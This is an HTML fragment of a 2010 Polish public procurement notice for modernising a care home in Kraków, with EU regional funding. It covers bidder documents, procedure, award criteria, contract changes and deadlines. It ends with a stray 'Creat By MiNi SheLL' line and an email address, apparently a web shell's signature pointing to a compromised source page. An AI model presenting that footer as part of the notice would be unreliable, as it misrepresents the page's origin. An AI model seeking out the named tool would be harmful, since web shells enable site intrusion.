<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na  warunkach określonych we wzorze umowy stanowiącym formularz nr 9 do siwz.
2.Zamawiajacy dopuszcza zmiany postanowień zawartej umowy, s stosunku do tresci oferty, na podstawie której dokonano wyboru Wykonawcy, zakresie terminu wykonania przedmiotu zamówienia, występowania robót zamiennych. 
3.Zakazuje się zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru oferenta, chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskluzeka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
ul. Kluzeka 6
31-222 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 09:00, miejsce: Dom Pomocy Społecznej
ul. Kluzeka 6
31-222 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Nazwa Programu Operacyjnego
MRPO- Małopolski Regionalny Program Operacyjny
2. Numer i nazwa osi Priorytetowej
6. Spójność wewnątrzregionalna
3. Numer i nazwa działania 
6.3 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego
Schemat B: Opieka społeczna
4. Nazwa Projektu
Modernizacja DPS przy ul. Kluzeka6 w Krakowie w celu dostosowania jednostki do wymogów prawa oraz potrzeb osób niepełnosprawnych
5. Numer Projektu
MRPO.06.03.02-12-529/09
6. Umowa o dofinansowanie numer
MRPO.06.03.02-12-529/09-00-XVI/423/FE/10.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com